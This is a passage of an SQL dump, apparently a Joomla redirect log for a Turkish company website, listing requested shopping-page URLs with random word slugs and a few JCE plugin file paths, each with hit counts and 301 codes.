23:27:27','0000-00-00 00:00:00',301),(67619,'https://3s-technologies.com.tr/tr/shopping/fretting/4193652711.html',NULL,'https://3s-technologies.com.tr/shopping/fretting/4193652711.html','',1,0,'2026-06-10 23:27:30','0000-00-00 00:00:00',301),(67620,'http://3s-technologies.com.tr/tr/shopping/admirability/100373545.html',NULL,'','',1,0,'2026-06-10 23:27:31','0000-00-00 00:00:00',301),(67621,'http://3s-technologies.com.tr/tr/shopping/catabiotic/3517364992.html',NULL,'','',1,0,'2026-06-10 23:27:33','0000-00-00 00:00:00',301),(67622,'http://3s-technologies.com.tr/tr/shopping/fermentable/2471132144.html',NULL,'','',1,0,'2026-06-10 23:27:35','0000-00-00 00:00:00',301),(67623,'https://3s-technologies.com.tr/tr/shopping/tresses/2044137370.html',NULL,'https://3s-technologies.com.tr/shopping/tresses/2044137370.html','',1,0,'2026-06-10 23:27:35','0000-00-00 00:00:00',301),(67624,'http://3s-technologies.com.tr/tr/shopping/downstair/7946365.html',NULL,'','',1,0,'2026-06-10 23:27:38','0000-00-00 00:00:00',301),(67625,'https://3s-technologies.com.tr/tr/shopping/jolted/3543511001.html',NULL,'https://3s-technologies.com.tr/shopping/jolted/3543511001.html','',1,0,'2026-06-10 23:27:38','0000-00-00 00:00:00',301),(67626,'https://3s-technologies.com.tr/tr/shopping/selenographer/2284231672.html',NULL,'https://3s-technologies.com.tr/shopping/selenographer/2284231672.html','',1,0,'2026-06-10 23:27:41','0000-00-00 00:00:00',301),(67627,'https://3s-technologies.com.tr/tr/shopping/oscillatingprenominal/2682233576.html',NULL,'https://3s-technologies.com.tr/shopping/oscillatingprenominal/2682233576.html','',1,0,'2026-06-10 23:27:44','0000-00-00 00:00:00',301),(67628,'https://3s-technologies.com.tr/tr/shopping/surah/4203454520.html',NULL,'https://3s-technologies.com.tr/shopping/surah/4203454520.html','',1,0,'2026-06-10 23:27:47','0000-00-00 00:00:00',301),(67629,'https://3s-technologies.com.tr/tr/shopping/cormoraut/3579499675.html',NULL,'https://3s-technologies.com.tr/shopping/cormoraut/3579499675.html','',1,0,'2026-06-10 23:27:50','0000-00-00 00:00:00',301),(67630,'https://3s-technologies.com.tr/tr/shopping/microphotography/319165636.html',NULL,'https://3s-technologies.com.tr/shopping/microphotography/319165636.html','',1,0,'2026-06-10 23:27:53','0000-00-00 00:00:00',301),(67631,'https://3s-technologies.com.tr/tr/shopping/renunciation/1186471175.html',NULL,'https://3s-technologies.com.tr/shopping/renunciation/1186471175.html','',1,0,'2026-06-10 23:27:56','0000-00-00 00:00:00',301),(67632,'https://3s-technologies.com.tr/tr/shopping/gillii/3829327581.html',NULL,'https://3s-technologies.com.tr/shopping/gillii/3829327581.html','',1,0,'2026-06-10 23:27:59','0000-00-00 00:00:00',301),(67633,'https://3s-technologies.com.tr/tr/shopping/championness/2126668871.html',NULL,'https://3s-technologies.com.tr/shopping/championness/2126668871.html','',1,0,'2026-06-10 23:28:03','0000-00-00 00:00:00',301),(67634,'https://3s-technologies.com.tr/tr/shopping/pamperer/4278181320.html',NULL,'https://3s-technologies.com.tr/shopping/pamperer/4278181320.html','',1,0,'2026-06-10 23:28:05','0000-00-00 00:00:00',301),(67635,'https://3s-technologies.com.tr/tr/shopping/brachiolaria/154987364.html',NULL,'https://3s-technologies.com.tr/shopping/brachiolaria/154987364.html','',1,0,'2026-06-10 23:28:08','0000-00-00 00:00:00',301),(67636,'https://3s-technologies.com.tr/tr/shopping/iguanodon/1203105911.html',NULL,'https://3s-technologies.com.tr/shopping/iguanodon/1203105911.html','',1,0,'2026-06-10 23:28:11','0000-00-00 00:00:00',301),(67637,'https://3s-technologies.com.tr/tr/shopping/adjudicative/934381294.html',NULL,'https://3s-technologies.com.tr/shopping/adjudicative/934381294.html','',1,0,'2026-06-10 23:28:14','0000-00-00 00:00:00',301),(67638,'https://3s-technologies.com.tr/tr/shopping/prosodiacally/1503271808.html',NULL,'https://3s-technologies.com.tr/shopping/prosodiacally/1503271808.html','',1,0,'2026-06-10 23:28:17','0000-00-00 00:00:00',301),(67639,'https://3s-technologies.com.tr/tr/shopping/lacunar/2273464290.html',NULL,'https://3s-technologies.com.tr/shopping/lacunar/2273464290.html','',1,0,'2026-06-10 23:28:20','0000-00-00 00:00:00',301),(67640,'https://3s-technologies.com.tr/tr/shopping/uroxanic/3648870185.html',NULL,'https://3s-technologies.com.tr/shopping/uroxanic/3648870185.html','',1,0,'2026-06-10 23:28:23','0000-00-00 00:00:00',301),(67641,'https://3s-technologies.com.tr/tr/shopping/doggerman/3738431772.html',NULL,'https://3s-technologies.com.tr/shopping/doggerman/3738431772.html','',1,0,'2026-06-10 23:28:26','0000-00-00 00:00:00',301),(67642,'https://3s-technologies.com.tr/tr/shopping/overliberally/4256237478.html',NULL,'https://3s-technologies.com.tr/shopping/overliberally/4256237478.html','',1,0,'2026-06-10 23:28:30','0000-00-00 00:00:00',301),(67643,'https://3s-technologies.com.tr/tr/shopping/xiphosoma/157692213.html',NULL,'https://3s-technologies.com.tr/shopping/xiphosoma/157692213.html','',1,0,'2026-06-10 23:28:33','0000-00-00 00:00:00',301),(67644,'https://3s-technologies.com.tr/tr/shopping/bacteriophages/2204797985.html',NULL,'https://3s-technologies.com.tr/shopping/bacteriophages/2204797985.html','',1,0,'2026-06-10 23:28:36','0000-00-00 00:00:00',301),(67645,'https://3s-technologies.com.tr/tr/shopping/photoplay/1283605274.html',NULL,'https://3s-technologies.com.tr/shopping/photoplay/1283605274.html','',1,0,'2026-06-10 23:28:39','0000-00-00 00:00:00',301),(67646,'https://3s-technologies.com.tr/tr/shopping/sundowner/170081759.html',NULL,'https://3s-technologies.com.tr/shopping/sundowner/170081759.html','',1,0,'2026-06-10 23:28:42','0000-00-00 00:00:00',301),(67647,'https://3s-technologies.com.tr/tr/shopping/mignonette/3176114884.html',NULL,'https://3s-technologies.com.tr/shopping/mignonette/3176114884.html','',1,0,'2026-06-10 23:28:45','0000-00-00 00:00:00',301),(67648,'https://3s-technologies.com.tr/tr/shopping/frustrable/1566120142.html',NULL,'https://3s-technologies.com.tr/shopping/frustrable/1566120142.html','',1,0,'2026-06-10 23:28:48','0000-00-00 00:00:00',301),(67649,'https://3s-technologies.com.tr/en/plugins/editors/jce/jce.xml',NULL,'','',1,0,'2026-06-10 23:28:49','0000-00-00 00:00:00',301),(67650,'https://3s-technologies.com.tr/en/plugins/system/jcemediabox/js/jcemediabox.js',NULL,'','',1,0,'2026-06-10 23:28:49','0000-00-00 00:00:00',301),(67651,'https://3s-technologies.com.tr/en/plugins/system/jce/css/content.css',NULL,'','',1,0,'2026-06-10 23:28:49','0000-00-00 00:00:00',301),(67652,'https://3s-technologies.com.tr/en/administrator/components/com_jce/jce.xml',NULL,'','',1,0,'2026-06-10 23:28:50','0000-00-00 00:00:00',301),(67653,'https://3s-technologies.com.tr/tr/shopping/hylobate/658044065.html',NULL,'https://3s-technologies.com.tr/shopping/hylobate/658044065.html','',1,0,'2026-06-10 23:28:51','0000-00-00 00:00:00',301),(67654,'https://3s-technologies.com.tr/tr/shopping/repellent/2562157736.html',NULL,'https://3s-technologies.com.tr/shopping/repellent/2562157736.html','',1,0,'2026-06-10 23:28:54','0000-00-00 00:00:00',301),(67655,'https://3s-technologies.com.tr/tr/shopping/incogitable/3113430073.html',NULL,'https://3s-technologies.com.tr/shopping/incogitable/3113430073.html','',1,0,'2026-06-10 23:29:01','0000-00-00 00:00:00',301),(67656,'https://3s-technologies.com.tr/tr/shopping/hematocrystallin/2966887522.html',NULL,'https://3s-technologies.com.tr/shopping/hematocrystallin/2966887522.html','',1,0,'2026-06-10 23:29:03','0000-00-00 00:00:00',301),(67657,'https://3s-technologies.com.tr/tr/shopping/amylic/1830271755.html',NULL,'https://3s-technologies.com.tr/shopping/amylic/1830271755.html','',1,0,'2026-06-10 23:29:06','0000-00-00 00:00:00',301),(67658,'https://3s-technologies.com.tr/tr/shopping/irreverend/893197895.html',NULL,'https://3s-technologies.com.tr/shopping/irreverend/893197895.html','',1,0,'2026-06-10 23:29:10','0000-00-00 00:00:00',301),(67659,'https://3s-technologies.com.tr/tr/shopping/nitratine/2527348812.html',NULL,'https://3s-technologies.com.tr/shopping/nitratine/2527348812.html','',1,0,'2026-06-10 23:29:13','0000-00-00 00:00:00',301),(67660,'https://3s-technologies.com.tr/tr/shopping/cacochymic/2083320914.html',NULL,'https://3s-technologies.com.tr/shopping/cacochymic/2083320914.html','',1,0,'2026-06-10 23:29:18','0000-00-00 00:00:00',301),(67661,'https://3s-technologies.com.tr/tr/shopping/disreputable/1343898284.html',NULL,'https://3s-technologies.com.tr/shopping/disreputable/1343898284.html','',1,0,'2026-06-10 23:29:20','0000-00-00 00:00:00',301),(67662,'http://3s-technologies.com.tr/tr/shopping/minimus/1499233148.html',NULL,'','',2,0,'2026-06-10 23:29:23','0000-00-00 00:00:00',301),(67663,'https://3s-technologies.com.tr/tr/shopping/samaj/3030947939.html',NULL,'https://3s-technologies.com.tr/shopping/samaj/3030947939.html','',1,0,'2026-06-10 23:29:23','0000-00-00 00:00:00',301),(67664,'https://3s-technologies.com.tr/tr/shopping/teaspoonfuls/1587015408.html',NULL,'https://3s-technologies.com.tr/shopping/teaspoonfuls/1587015408.html','',1,0,'2026-06-10 23:29:27','0000-00-00 00:00:00',301),(67665,'http://3s-technologies.com.tr/tr/shopping/inexplicit/3303499361.html',NULL,'','',2,0,'2026-06-10 23:29:27','0000-00-00 00:00:00',301),(67666,'https://3s-technologies.com.tr/tr/shopping/radiotherapy/103970778.html',NULL,'https://3s-technologies.com.tr/shopping/radiotherapy/103970778.html','',1,0,'2026-06-10 23:29:30','0000-00-00 00:00:00',301),(67667,'http://3s-technologies.com.tr/tr/shopping/prorhinal/1724250584.html',NULL,'','',2,0,'2026-06-10 23:29:30','0000-00-00 00:00:00',301),(67668,'https://3s-technologies.com.tr/tr/shopping/renascible/1223067985.html',NULL,'https://3s-technologies.com.tr/shopping/renascible/1223067985.html','',1,0,'2026-06-10 23:29:33','0000-00-00 00:00:00',301),(67669,'http://3s-technologies.com.tr/tr/shopping/oddment/3840824711.html',NULL,'','',2,0,'2026-06-10 23:29:35','0000-00-00 00:00:00',301),(67670,'https://3s-technologies.com.tr/tr/shopping/powwow/549310375.html',NULL,'https://3s-technologies.com.tr/shopping/powwow/549310375.html','',1,0,'2026-06-10 23:29:36','0000-00-00 00:00:00',301),(67671,'https://3s-technologies.com.tr/tr/shopping/haemapophysial/1011604012.html',NULL,'https://3s-technologies.com.tr/shopping/haemapophysial/1011604012.html','',1,0,'2026-06-10 23:29:39','0000-00-00 00:00:00',301),(67672,'http://3s-technologies.com.tr/tr/shopping/mobocrat/2936545642.html',NULL,'','',1,0,'2026-06-10 23:29:39','0000-00-00 00:00:00',301),(67673,'http://3s-technologies.com.tr/tr/shopping/qualify/2973402060.html',NULL,'','',1,0,'2026-06-10 23:29:40','0000-00-00 00:00:00',301),(67674,'https://3s-technologies.com.tr/tr/shopping/releasing/688676449.html',NULL,'https://3s-technologies.com.tr/shopping/releasing/688676449.html','',1,0,'2026-06-10 23:29:41','0000-00-00 00:00:00',301),(67675,'https://3s-technologies.com.tr/tr/shopping/orchel/1031611462.html',NULL,'https://3s-technologies.com.tr/shopping/orchel/1031611462.html','',1,0,'2026-06-10 23:29:46','0000-00-00 00:00:00',301),(67676,'https://3s-technologies.com.tr/tr/shopping/brooked/3086174378.html',NULL,'https://3s-technologies.com.tr/shopping/brooked/3086174378.html','',1,0,'2026-06-10 23:29:48','0000-00-00 00:00:00',301),(67677,'https://3s-technologies.com.tr/tr/shopping/christened/2753021875.html',NULL,'https://3s-technologies.com.tr/shopping/christened/2753021875.html','',1,0,'2026-06-10 23:29:51','0000-00-00 00:00:00',301),(67678,'https://3s-technologies.com.tr/tr/shopping/freshes/4169728297.html',NULL,'https://3s-technologies.com.tr/shopping/freshes/4169728297.html','',1,0,'2026-06-10 23:29:54','0000-00-00 00:00:00',301),(67679,'https://3s-technologies.com.tr/tr/shopping/antidorcas/2040647512.html',NULL,'https://3s-technologies.com.tr/shopping/antidorcas/2040647512.html','',1,0,'2026-06-10 23:29:57','0000-00-00 00:00:00',301),(67680,'https://3s-technologies.com.tr/tr/shopping/citric/3412391087.html',NULL,'https://3s-technologies.com.tr/shopping/citric/3412391087.html','',1,0,'2026-06-10 23:30:01','0000-00-00 00:00:00',301),(67681,'https://3s-technologies.com.tr/tr/shopping/mucuna/3112217974.html',NULL,'https://3s-technologies.com.tr/shopping/mucuna/3112217974.html','',1,0,'2026-06-10 23:30:03','0000-00-00 00:00:00',301),(67682,'https://3s-technologies.com.tr/tr/shopping/cysticercus/340567036.html',NULL,'https://3s-technologies.com.tr/shopping/cysticercus/340567036.html','',1,0,'2026-06-10 23:30:06','0000-00-00 00:00:00',301),(67683,'https://3s-technologies.com.tr/tr/shopping/bibliographer/1579721771.html',NULL,'https://3s-technologies.com.tr/shopping/bibliographer/1579721771.html','',1,0,'2026-06-10 23:30:09','0000-00-00 00:00:00',301),(67684,'https://3s-technologies.com.tr/tr/shopping/kennelled/3724549476.html',NULL,'https://3s-technologies.com.tr/shopping/kennelled/3724549476.html','',1,0,'2026-06-10 23:30:15','0000-00-00 00:00:00',301),(67685,'https://3s-technologies.com.tr/tr/shopping/gelidus/590493774.html',NULL,'https://3s-technologies.com.tr/shopping/gelidus/590493774.html','',1,0,'2026-06-10 23:30:17','0000-00-00 00:00:00',301),(67686,'https://3s-technologies.com.tr/tr/shopping/allegorizer/3094354055.html',NULL,'https://3s-technologies.com.tr/shopping/allegorizer/3094354055.html','',1,0,'2026-06-10 23:30:20','0000-00-00 00:00:00',301),(67687,'https://3s-technologies.com.tr/tr/shopping/bartery/3094517578.html',NULL,'https://3s-technologies.com.tr/shopping/bartery/3094517578.html','',1,0,'2026-06-10 23:30:23','0000-00-00 00:00:00',301),(67688,'https://3s-technologies.com.tr/tr/shopping/inviscerate/2050708945.html',NULL,'https://3s-technologies.com.tr/shopping/inviscerate/2050708945.html','',1,0,'2026-06-10 23:30:26','0000-00-00 00:00:00',301),(67689,'https://3s-technologies.com.tr/tr/shopping/callyciflorous/175882630.html',NULL,'https://3s-technologies.com.tr/shopping/callyciflorous/175882630.html','',1,0,'2026-06-10 23:30:29','0000-00-00 00:00:00',301),(67690,'https://3s-technologies.com.tr/tr/shopping/paraphernalia/4109694927.html',NULL,'https://3s-technologies.com.tr/shopping/paraphernalia/4109694927.html','',1,0,'2026-06-10 23:30:32','0000-00-00 00:00:00',301),(67691,'https://3s-technologies.com.tr/tr/shopping/busked/2523808584.html',NULL,'https://3s-technologies.com.tr/shopping/busked/2523808584.html','',1,0,'2026-06-10 23:30:35','0000-00-00 00:00:00',301),(67692,'https://3s-technologies.com.tr/tr/shopping/glutinousness/4081788858.html',NULL,'https://3s-technologies.com.tr/shopping/glutinousness/4081788858.html','',1,0,'2026-06-10 23:30:38','0000-00-00 00:00:00',301),(67693,'https://3s-technologies.com.tr/tr/shopping/acarine/733496129.html',NULL,'https://3s-technologies.com.tr/shopping/acarine/733496129.html','',1,0,'2026-06-10 23:30:44','0000-00-00 00:00:00',301),(67694,'https://3s-technologies.com.tr/tr/shopping/hypsopsetta/1570872437.html',NULL,'https://3s-technologies.com.tr/shopping/hypsopsetta/1570872437.html','',1,0,'2026-06-10 23:30:46','0000-00-00 00:00:00',301),(67695,'https://3s-technologies.com.tr/tr/shopping/synclinical/3887258853.html',NULL,'https://3s-technologies.com.tr/shopping/synclinical/3887258853.html','',1,0,'2026-06-10 23:30:49','0000-00-00 00:00:00',301),(67696,'https://3s-technologies.com.tr/tr/shopping/excavated/2746875662.html',NULL,'https://3s-technologies.com.tr/shopping/excavated/2746875662.html','',1,0,'2026-06-10 23:30:52','0000-00-00 00:00:00',301),(67697,'https://3s-technologies.com.tr/tr/shopping/wartwort/114754289.html',NULL,'https://3s-technologies.com.tr/shopping/wartwort/114754289.html','',1,0,'2026-06-10 23:30:55','0000-00-00 00:00:00',301),(67698,'https://3s-technologies.com.tr/tr/shopping/equivalently/1097862111.html',NULL,'https://3s-technologies.com.tr/shopping/equivalently/1097862111.html','',1,0,'2026-06-10 23:30:58','0000-00-00 00:00:00',301),(67699,'https://3s-technologies.com.tr/tr/shopping/meseemed/2784911766.html',NULL,'https://3s-technologies.com.tr/shopping/meseemed/2784911766.html','',1,0,'2026-06-10 23:31:01','0000-00-00 00:00:00',301),(67700,'https://3s-technologies.com.tr/tr/shopping/elephantum/1580933870.html',NULL,'https://3s-technologies.com.tr/shopping/elephantum/1580933870.html','',1,0,'2026-06-10 23:31:04','0000-00-00 00:00:00',301),(67701,'https://3s-technologies.com.tr/tr/shopping/ascent/2755446073.html',NULL,'https://3s-technologies.com.tr/shopping/ascent/2755446073.html','',1,0,'2026-06-10 23:31:07','0000-00-00 00:00:00',301),(67702,'https://3s-technologies.com.tr/tr/shopping/jingler/3502608285.html',NULL,'https://3s-technologies.com.tr/shopping/jingler/3502608285.html','',1,0,'2026-06-10 23:31:14','0000-00-00 00:00:00',301),(67703,'https://3s-technologies.com.tr/tr/shopping/nemertean/1017568406.html',NULL,'https://3s-technologies.com.tr/shopping/nemertean/1017568406.html','',1,0,'2026-06-10 23:31:18','0000-00-00 00:00:00',301),(67704,'https://3s-technologies.com.tr/tr/shopping/alforja/1266512043.html',NULL,'https://3s-technologies.com.tr/shopping/alforja/1266512043.html','',1,0,'2026-06-10 23:31:21','0000-00-00 00:00:00',301),(67705,'https://3s-technologies.com.tr/tr/shopping/kamtschadal/335978232.html',NULL,'https://3s-technologies.com.tr/shopping/kamtschadal/335978232.html','',1,0,'2026-06-10 23:31:24','0000-00-00 00:00:00',301),(67706,'https://3s-technologies.com.tr/tr/shopping/trunnel/1080442366.html',NULL,'https://3s-technologies.com.tr/shopping/trunnel/1080442366.html','',1,0,'2026-06-10 23:31:27','0000-00-00 00:00:00',301),(67707,'https://3s-technologies.com.tr/tr/shopping/frampel/3836784725.html',NULL,'https://3s-technologies.com.tr/shopping/frampel/3836784725.html','',1,0,'2026-06-10 23:31:30','0000-00-00 00:00:00',301),(67708,'https://3s-technologies.com.tr/tr/shopping/reaving/3956746523.html',NULL,'https://3s-technologies.com.tr/shopping/reaving/3956746523.html','',1,0,'2026-06-10 23:31:33','0000-00-00 00:00:00',301),(67709,'http://3s-technologies.com.tr/tr/shopping/blooming/751139504.html',NULL,'','',1,0,'2026-06-10 23:31:34','0000-00-00 00:00:00',301),(67710,'https://3s-technologies.com.tr/tr/shopping/confarreation/4052814962.html',NULL,'https://3s-technologies.com.tr/shopping/confarreation/4052814962.html','',1,0,'2026-06-10 23:31:36','0000-00-00 00:00:00',301),(67711,'https://3s-technologies.com.tr/tr/shopping/miscomfort/2214139084.html',NULL,'https://3s-technologies.com.tr/shopping/miscomfort/2214139084.html','',1,0,'2026-06-10 23:31:39','0000-00-00 00:00:00',301),(67712,'https://3s-technologies.com.tr/tr/shopping/carcinological/4064088478.html',NULL,'https://3s-technologies.com.tr/shopping/carcinological/4064088478.html','',1,0,'2026-06-10 23:31:42','0000-00-00 00:00:00',301),(67713,'https://3s-technologies.com.tr/tr/shopping/zanies/908292290.html',NULL,'https://3s-technologies.com.tr/shopping/zanies/908292290.html','',1,0,'2026-06-10 23:31:45','0000-00-00 00:00:00',301),(67714,'https://3s-technologies.com.tr/tr/shopping/penknives/1711030275.html',NULL,'https://3s-technologies.com.tr/shopping/penknives/1711030275.html','',1,0,'2026-06-10 23:31:48','0000-00-00 00:00:00',301),(67715,'https://3s-technologies.com.tr/tr/shopping/betid/1719094584.html',NULL,'https://3s-technologies.com.tr/shopping/betid/1719094584.html','',1,0,'2026-06-10 23:31:51','0000-00-00 00:00:00',301),(67716,'https://3s-technologies.com.tr/tr/shopping/tetranychus/1831483854.html',NULL,'https://3s-technologies.com.tr/shopping/tetranychus/1831483854.html','',1,0,'2026-06-10 23:31:54','0000-00-00 00:00:00',301),(67717,'https://3s-technologies.com.tr/tr/shopping/palaestra/65000479.html',NULL,'https://3s-technologies.com.tr/shopping/palaestra/65000479.html','',1,0,'2026-06-10 23:31:57','0000-00-00 00:00:00',301),(67718,'https://3s-technologies.com.tr/tr/shopping/febrifugal/1643480000.html',NULL,'https://3s-technologies.com.tr/shopping/febrifugal/1643480000.html','',1,0,'2026-06-10 23:32:00','0000-00-00 00:00:00',301),(67719,'https://3s-technologies.com.tr/tr/shopping/bambusa/4182559254.html',NULL,'https://3s-technologies.com.tr/shopping/bambusa/4182559254.html','',1,0,'2026-06-10 23:32:03','0000-00-00 00:00:00',301),(67720,'https://3s-technologies.com.tr/tr/shopping/craie/3688677946.html',NULL,'https://3s-technologies.com.tr/shopping/craie/3688677946.html','',1,0,'2026-06-10 23:32:06','0000-00-00 00:00:00',301),(67721,'http://3s-technologies.com.tr/tr/shopping/retrorsely/1720873895.html',NULL,'','',1,0,'2026-06-10 23:32:07','0000-00-00 00:00:00',301),(67722,'https://3s-technologies.com.tr/tr/shopping/orthospermous/973191140.html',NULL,'https://3s-technologies.com.tr/shopping/orthospermous/973191140.html','',1,0,'2026-06-10 23:32:12','0000-00-00 00:00:00',301),(67723,'https://3s-technologies.com.tr/tr/shopping/sheepskin/55546195.html',NULL,'https://3s-technologies.com.tr/shopping/sheepskin/55546195.html','',1,0,'2026-06-10 23:32:16','0000-00-00 00:00:00',301),(67724,'https://3s-technologies.com.tr/tr/shopping/twister/3559375065.html',NULL,'https://3s-technologies.com.tr/shopping/twister/3559375065.html','',1,0,'2026-06-10 23:32:19','0000-00-00 00:00:00',301),(67725,'https://3s-technologies.com.tr/tr/shopping/female/3054120964.html',NULL,'https://3s-technologies.com.tr/shopping/female/3054120964.html','',1,0,'2026-06-10 23:32:22','0000-00-00 00:00:00',301),(67726,'https://3s-technologies.com.tr/tr/shopping/reconvey/2783699667.html',NULL,'https://3s-technologies.com.tr/shopping/reconvey/2783699667.html','',1,0,'2026-06-10 23:32:25','0000-00-00 00:00:00',301),(67727,'http://3s-technologies.com.tr/tr/shopping/humeri/1523668626.html',NULL,'','',2,0,'2026-06-10 23:32:28','0000-00-00 00:00:00',301),(67728,'https://3s-technologies.com.tr/tr/shopping/phyllodineous/2357486781.html',NULL,'https://3s-technologies.com.tr/shopping/phyllodineous/2357486781.html','',1,0,'2026-06-10 23:32:29','0000-00-00 00:00:00',301),(67729,'https://3s-technologies.com.tr/tr/shopping/likehood/926252278.html',NULL,'https://3s-technologies.com.tr/shopping/likehood/926252278.html','',1,0,'2026-06-10 23:32:31','0000-00-00 00:00:00',301),(67730,'https://3s-technologies.com.tr/tr/shopping/swinishly/2546261307.html',NULL,'https://3s-technologies.com.tr/shopping/swinishly/2546261307.html','',1,0,'2026-06-10 23:32:34','0000-00-00 00:00:00',301),(67731,'https://3s-technologies.com.tr/tr/shopping/neuromuscular/393515700.html',NULL,'https://3s-technologies.com.tr/shopping/neuromuscular/393515700.html','',1,0,'2026-06-10 23:32:38','0000-00-00 00:00:00',301),(67732,'https://3s-technologies.com.tr/tr/shopping/closetongued/806965422.html',NULL,'https://3s-technologies.com.tr/shopping/closetongued/806965422.html','',1,0,'2026-06-10 23:32:41','0000-00-00 00:00:00',301),(67733,'https://3s-technologies.com.tr/tr/shopping/kinepox/1456843994.html',NULL,'https://3s-technologies.com.tr/shopping/kinepox/1456843994.html','',1,0,'2026-06-10 23:32:44','0000-00-00 00:00:00',301),(67734,'https://3s-technologies.com.tr/tr/shopping/proverbialist/4163646759.html',NULL,'https://3s-technologies.com.tr/shopping/proverbialist/4163646759.html','',1,0,'2026-06-10 23:32:51','0000-00-00 00:00:00',301),(67735,'https://3s-technologies.com.tr/tr/shopping/muscularity/2757610663.html',NULL,'https://3s-technologies.com.tr/shopping/muscularity/2757610663.html','',1,0,'2026-06-10 23:32:54','0000-00-00 00:00:00',301),(67736,'https://3s-technologies.com.tr/tr/shopping/covetiveness/1005081031.html',NULL,'https://3s-technologies.com.tr/shopping/covetiveness/1005081031.html','',1,0,'2026-06-10 23:32:57','0000-00-00 00:00:00',301),(67737,'https://3s-technologies.com.tr/tr/shopping/dreadfulness/1825682951.html',NULL,'https://3s-technologies.com.tr/shopping/dreadfulness/1825682951.html','',1,0,'2026-06-10 23:33:00','0000-00-00 00:00:00',301),(67738,'https://3s-technologies.com.tr/tr/shopping/unconsummated/3465634739.html',NULL,'https://3s-technologies.com.tr/shopping/unconsummated/3465634739.html','',1,0,'2026-06-10 23:33:03','0000-00-00 00:00:00',301),(67739,'http://3s-technologies.com.tr/tr/shopping/abridgement/4034565748.html',NULL,'','',1,0,'2026-06-10 23:33:03','0000-00-00 00:00:00',301),(67740,'https://3s-technologies.com.tr/tr/shopping/epiphragm/27520831.html',NULL,'https://3s-technologies.com.tr/shopping/epiphragm/27520831.html','',1,0,'2026-06-10 23:33:06','0000-00-00 00:00:00',301),(67741,'https://3s-technologies.com.tr/tr/shopping/municipalities/2094939772.html',NULL,'https://3s-technologies.com.tr/shopping/municipalities/2094939772.html','',1,0,'2026-06-10 23:33:09','0000-00-00 00:00:00',301),(67742,'https://3s-technologies.com.tr/tr/shopping/enaunter/2862740421.html',NULL,'https://3s-technologies.com.tr/shopping/enaunter/2862740421.html','',1,0,'2026-06-10 23:33:12','0000-00-00 00:00:00',301),(67743,'https://3s-technologies.com.tr/tr/shopping/erythroneura/43663770.html',NULL,'https://3s-technologies.com.tr/shopping/erythroneura/43663770.html','',1,0,'2026-06-10 23:33:15','0000-00-00 00:00:00',301),(67744,'https://3s-technologies.com.tr/tr/shopping/vestment/2468253903.html',NULL,'https://3s-technologies.com.tr/shopping/vestment/2468253903.html','',1,0,'2026-06-10 23:33:20','0000-00-00 00:00:00',301),(67745,'https://3s-technologies.com.tr/tr/shopping/metacinnabarite/3719960704.html',NULL,'https://3s-technologies.com.tr/shopping/metacinnabarite/3719960704.html','',1,0,'2026-06-10 23:33:23','0000-00-00 00:00:00',301),(67746,'https://3s-technologies.com.tr/tr/shopping/trochocopus/2518007713.html',NULL,'https://3s-technologies.com.tr/shopping/trochocopus/2518007713.html','',1,0,'2026-06-10 23:33:26','0000-00-00 00:00:00',301),(67747,'https://3s-technologies.com.tr/tr/shopping/cabirian/2922883922.html',NULL,'https://3s-technologies.com.tr/shopping/cabirian/2922883922.html','',1,0,'2026-06-10 23:33:29','0000-00-00 00:00:00',301),(67748,'https://3s-technologies.com.tr/tr/shopping/inerrably/3047319108.html',NULL,'https://3s-technologies.com.tr/shopping/inerrably/3047319108.html','',1,0,'2026-06-10 23:33:32','0000-00-00 00:00:00',301),(67749,'https://3s-technologies.com.tr/tr/shopping/ancien/463003354.html',NULL,'https://3s-technologies.com.tr/shopping/ancien/463003354.html','',1,0,'2026-06-10 23:33:35','0000-00-00 00:00:00',301),(67750,'https://3s-technologies.com.tr/tr/shopping/crotonine/313084114.html',NULL,'https://3s-technologies.com.tr/shopping/crotonine/313084114.html','',1,0,'2026-06-10 23:33:38','0000-00-00 00:00:00',301),(67751,'https://3s-technologies.com.tr/tr/shopping/garrupa/2971476294.html',NULL,'https://3s-technologies.com.tr/shopping/garrupa/2971476294.html','',1,0,'2026-06-10 23:33:42','0000-00-00 00:00:00',301),(67752,'https://3s-technologies.com.tr/tr/shopping/vagile/831842311.html',NULL,'https://3s-technologies.com.tr/shopping/vagile/831842311.html','',1,0,'2026-06-10 23:33:44','0000-00-00 00:00:00',301),(67753,'https://3s-technologies.com.tr/tr/shopping/bipupillate/4260826266.html',NULL,'https://3s-technologies.com.tr/shopping/bipupillate/4260826266.html','',1,0,'2026-06-10 23:33:48','0000-00-00 00:00:00',301),(67754,'https://3s-technologies.com.tr/tr/shopping/unfertileness/3420469717.html',NULL,'https://3s-technologies.com.tr/shopping/unfertileness/3420469717.html','',1,0,'2026-06-10 23:33:50','0000-00-00 00:00:00',301),(67755,'http://3s-technologies.com.tr/tr/shopping/jeopard/2200759325.html',NULL,'','',2,0,'2026-06-10 23:33:53','0000-00-00 00:00:00',301),(67756,'https://3s-technologies.com.tr/tr/shopping/theophany/2599260648.html',NULL,'https://3s-technologies.com.tr/shopping/theophany/2599260648.html','',1,0,'2026-06-10 23:33:53','0000-00-00 00:00:00',301),(67757,'https://3s-technologies.com.tr/tr/shopping/tweedledum/3565193052.html',NULL,'https://3s-technologies.com.tr/shopping/tweedledum/3565193052.html','',1,0,'2026-06-10 23:33:56','0000-00-00 00:00:00',301),(67758,'https://3s-technologies.com.tr/tr/shopping/rimmer/1611426570.html',NULL,'https://3s-technologies.com.tr/shopping/rimmer/1611426570.html','',1,0,'2026-06-10 23:33:59','0000-00-00 00:00:00',301),(67759,'https://3s-technologies.com.tr/tr/shopping/callionymuslyra/3023654318.html',NULL,'https://3s-technologies.com.tr/shopping/callionymuslyra/3023654318.html','',1,0,'2026-06-10 23:34:02','0000-00-00 00:00:00',301),(67760,'https://3s-technologies.com.tr/tr/shopping/unfleshly/2618778109.html',NULL,'https://3s-technologies.com.tr/shopping/unfleshly/2618778109.html','',1,0,'2026-06-10 23:34:05','0000-00-00 00:00:00',301),(67761,'https://3s-technologies.com.tr/tr/shopping/doughbaked/1100190224.html',NULL,'https://3s-technologies.com.tr/shopping/doughbaked/1100190224.html','',1,0,'2026-06-10 23:34:08','0000-00-00 00:00:00',301),(67762,'https://3s-technologies.com.tr/tr/shopping/crannied/1948560712.html',NULL,'https://3s-technologies.com.tr/shopping/crannied/1948560712.html','',1,0,'2026-06-10 23:34:11','0000-00-00 00:00:00',301),(67763,'https://3s-technologies.com.tr/tr/shopping/genera/52254530.html',NULL,'https://3s-technologies.com.tr/shopping/genera/52254530.html','',1,0,'2026-06-10 23:34:17','0000-00-00 